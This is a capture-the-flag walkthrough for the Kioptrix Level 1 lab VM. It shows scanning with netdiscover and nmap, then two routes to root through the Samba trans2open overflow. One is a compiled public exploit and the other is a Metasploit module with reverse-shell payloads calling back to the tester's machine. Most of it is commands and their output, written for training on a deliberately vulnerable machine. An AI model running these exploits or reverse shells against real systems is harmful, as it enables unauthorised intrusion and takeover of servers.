After you find the vulnerabilities inside Kioptrix Level 1, the path to root should arrive quickly. Here are two methods to root the machine, remote code execution and remote buffer overflow (samba trans2open).
Get the IP address:
$ netdiscover -r 10.0.2.1/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:1f:b8:8b 1 60 PCS Systemtechnik GmbH
10.0.2.11 08:00:27:a8:3b:ba 1 60 PCS Systemtechnik GmbH
$ ping -c 1 10.0.2.11
PING 10.0.2.11 (10.0.2.11) 56(84) bytes of data.
64 bytes from 10.0.2.11: icmp_seq=1 ttl=255 time=2.15 ms
--- 10.0.2.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.154/2.154/2.154/0.000 ms
Scan with nmap:
$ nmap -vvv -Pn -sCV -p0-65535 --reason -T4 -oN nmap/kioptrix1.nmap 10.0.2.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 14:33 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
Initiating ARP Ping Scan at 14:33
Scanning 10.0.2.11 [1 port]
Completed ARP Ping Scan at 14:33, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:33
Completed Parallel DNS resolution of 1 host. at 14:33, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:33
Scanning 10.0.2.11 [65536 ports]
Discovered open port 80/tcp on 10.0.2.11
Discovered open port 443/tcp on 10.0.2.11
Discovered open port 139/tcp on 10.0.2.11
Discovered open port 22/tcp on 10.0.2.11
Discovered open port 111/tcp on 10.0.2.11
Discovered open port 32768/tcp on 10.0.2.11
Completed SYN Stealth Scan at 14:33, 3.89s elapsed (65536 total ports)
Initiating Service scan at 14:33
Scanning 6 services on 10.0.2.11
Completed Service scan at 14:33, 6.11s elapsed (6 services on 1 host)
NSE: Script scanning 10.0.2.11.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 10.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 1.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.01s elapsed
Nmap scan report for 10.0.2.11
Host is up, received arp-response (0.00013s latency).
Scanned at 2022-09-11 14:33:29 EDT for 21s
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 35 109482092953601530927446985143812377560925655194254170270380314520841776849335628258408994190413716152105684
4232803694672190935267401185077201676559347796344169835992470868400995032038002815261435672718624660573637058617607026
64279290804439502645034586412570490614431533437479630834594344497670338190191879537
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKtycvxuV/e7s2cN74HyTZXHXiBrwyiZe/PKT/inuT5NDSQTPsGiyJZU4gefPAsYKSw5wLe28TDlZWHAdXpNdwyn
4QrFQBjwFR+8WbFiAZBoWlSfQPR2RQW8i32Y2P2V79p4mu742HtWBz0hTjkd9qL5j8KCUPDfY9hzDuViWy7PAAAAFQCY9bvq+5rs1OpY5/DGsGx0k6CqGw
AAAIBVpBtIHbhvoQdN0WPe8d6OzTTFvdNRa8pWKzV1Hpw+e3qsC4LYHAy1NoeaqK8uJP9203MEkxrd2OoBJKn/8EXlKAco7vC1dr/QWae+NEkI1a38x0Ml
545vHAGFaVUWkffHekjhR476Uq4N4qeLfFp5B+v+9flLxYVYsY/ymJKpNgAAAIEApyjrqjgX0AE4fSBFntGFWM3j5M3lc5jw/0qufXlHJu8sZG0FRf9wTI
6HlJHHsIKHA7FZ33vGLq3TRmvZucJZ0l55fV2ASS9uvQRE+c8P6w72YCzgJN7v4hYXxnY4RiWvINjW/F6ApQEUJc742i6Fn54FEYAIy5goatGFMwpVq3Q=
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft4WXfXGWybh141E8XnWxMCu+R1qdocxhh+4Clz8wO9beuZzG1rjlAD+
XHiR3j2P+sw6UODeyBkuP24a+7V8P5nu9ksKD1fA83RyelgSgRJNQgPfFU3gngNno1yN6ossqkcMQTI1CY5nF6iYePs=
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/
countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizational
Unit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName
=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
| SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
| -----BEGIN CERTIFICATE-----
| MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x
| EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT
| EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu
| aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ
| ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkwOTI2MDkzMjA2WhcN
| MTAwOTI2MDkzMjA2WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0
| ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x
| HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs
| aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu
| bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4BXiK5bWlS
| ob4B6a9ALmKDbSxqoMcM3pvGHscFsJs+fHHn+CjU1DX44LPDNOwwOl6Uqb+GtZJv
| 6juVetDwcTbbocC2BM+6x6gyV/H6aYuCssCwrOuVKWp7l9xVpadjITUmhh+uB81q
| yqopt//Z4THww7SezLJQXi1+Grmp3iFDAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU
| 7OdRS0NrbNB8gE9qUjcw8LF8xKAwgegGA1UdIwSB4DCB3YAU7OdRS0NrbNB8gE9q
| Ujcw8LF8xKChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh
| dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u
| MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh
| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0
| LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA
| Vgrmpprfkmd8vy0E0UmZvWdIcDrIYRvUWcwSFwc6bGqJeJr0CYSB+jDQzA6Cu7nt
| xjrlXxEjHFBBbF4iEMJDnuQTFGvICQIcrqJoH3lqAO73u4TeBDjhv5n+h+S37CHd
| 1lvgRgoOay9dWaLKOyUThgKF2HcPWMZIj2froo5eihM=
|_-----END CERTIFICATE-----
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_ssl-date: 2022-09-11T22:33:49+00:00; +3h59m59s from scanner time.
| http-methods:
|_ Supported Methods: GET HEAD POST
32768/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:A8:3B:BA (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: 3h59m58s
|_smb2-time: Protocol negotiation failed (SMB2)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64050/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35315/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30121/udp): CLEAN (Failed to receive data)
| Check 4 (port 47139/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
After checking port 80 and not finding much of anything, try looking into port 139. Use Metasploit to scan for the samba version.
msf6 > search smb_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.2.11
RHOSTS => 10.0.2.11
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.2.11:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.2.11:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.2.11: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
On Google we can find this particular exploit:
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
Downloaded the exploit code and compile it in Kali. It's written in c.
$ gcc 10.c -o 10
$ ll
total 88K
-rwxr-xr-x 1 root root 40K Sep 11 16:01 10*
-rw-r--r-- 1 root root 45K Sep 11 16:00 10.c
The comments at the top of the file tell you how to run it.
$ ./10 -b 0 -v 10.0.2.11
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
which python
/usr/bin/python
cd /root
So that was a very quick path to root.
We can't upgrade the shell with python:
python -c 'import pty; pty.spawn("/bin/bash")'
Traceback (innermost last):
File "<string>", line 1, in ?
File "/usr/lib/python1.5/pty.py", line 101, in spawn
mode = tty.tcgetattr(STDIN_FILENO)
termios.error: (22, 'Invalid argument')
Checking man bash you will see the -i option: If the -i option is present, the shell is interactive. You can do the same thing with sh.
/bin/bash -i
bash: no job control in this shell
[root@kioptrix root]# cd /home
cd /home
[root@kioptrix home]#
There are two users in home.
[root@kioptrix home]# ll
ll
total 24
drwx------ 2 harold harold 4096 Sep 26 2009 harold
drwx------ 2 john john 4096 Sep 26 2009 john
drwxr-xr-x 2 root root 16384 Sep 26 2009 lost+found
[root@kioptrix home]# ls -la harold
ls -la harold
total 28
drwx------ 2 harold harold 4096 Sep 26 2009 .
drwxr-xr-x 5 root root 4096 Sep 26 2009 ..
-rw-r--r-- 1 harold harold 24 Sep 26 2009 .bash_logout
-rw-r--r-- 1 harold harold 191 Sep 26 2009 .bash_profile
-rw-r--r-- 1 harold harold 124 Sep 26 2009 .bashrc
-rw-r--r-- 1 harold harold 820 Sep 26 2009 .emacs
-rw-r--r-- 1 harold harold 3511 Sep 26 2009 .screenrc
[root@kioptrix home]# ls -la john
ls -la john
total 32
drwx------ 2 john john 4096 Sep 26 2009 .
drwxr-xr-x 5 root root 4096 Sep 26 2009 ..
-rw------- 1 john john 3 Sep 26 2009 .bash_history
-rw-r--r-- 1 john john 24 Sep 26 2009 .bash_logout
-rw-r--r-- 1 john john 191 Sep 26 2009 .bash_profile
-rw-r--r-- 1 john john 124 Sep 26 2009 .bashrc
-rw-r--r-- 1 john john 820 Sep 26 2009 .emacs
-rw-r--r-- 1 john john 3511 Sep 26 2009 .screenrc
[root@kioptrix home]# su - john
su - john
whoami
john
/bin/sh -i
sh: no job control in this shell
sh-2.05$ pwd
pwd
/home/john
sh-2.05$ exit
exit
exit
exit
[root@kioptrix home]# exit
exit
exit
/bin/sh -i
sh: no job control in this shell
sh-2.05#
Exit out of that shell back to Kali and check a little more on Samba.
$ searchsploit samba 2.2
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We see trans2open there quite a few times. Go back to msfconsole to find the one you can use.
msf6 > search trans2open
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Select the one for Linux and check the options:
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Set RHOSTS:
msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.0.2.11
RHOSTS => 10.0.2.11
Check Targets:
msf6 exploit(linux/samba/trans2open) > show targets
Exploit targets:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Run the exploit:
msf6 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.107:4444
[*] 192.168.56.110:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffafc...
[*] Sending stage (980808 bytes) to 192.168.56.110
[*] 192.168.56.110 - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (192.168.56.107:4444 -> 127.0.0.1) at 2021-12-11 11:37:42 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 192.168.56.110:139 - Trying return address 0xbffff9fc...
[*] Sending stage (980808 bytes) to 192.168.56.110
[*] Meterpreter session 2 opened (192.168.56.107:4444 -> 192.168.56.110:32782) at 2021-12-11 11:37:43 -0500
[*] 192.168.56.110 - Meterpreter session 2 closed. Reason: Died
Connection may keep dropping so look for the Non-Staged option and set it as the payload.
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Run exploit:
msf6 exploit(linux/samba/trans2open) > run
[*] Started reverse TCP handler on 192.168.56.107:4444
[*] 192.168.56.110:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.56.107:4444 -> 192.168.56.110:32801) at 2021-12-11 11:50:18 -0500
whoami
root
hostname
kioptrix.level1
Become root and you own it a second time.
Next: Kioptrix Level 2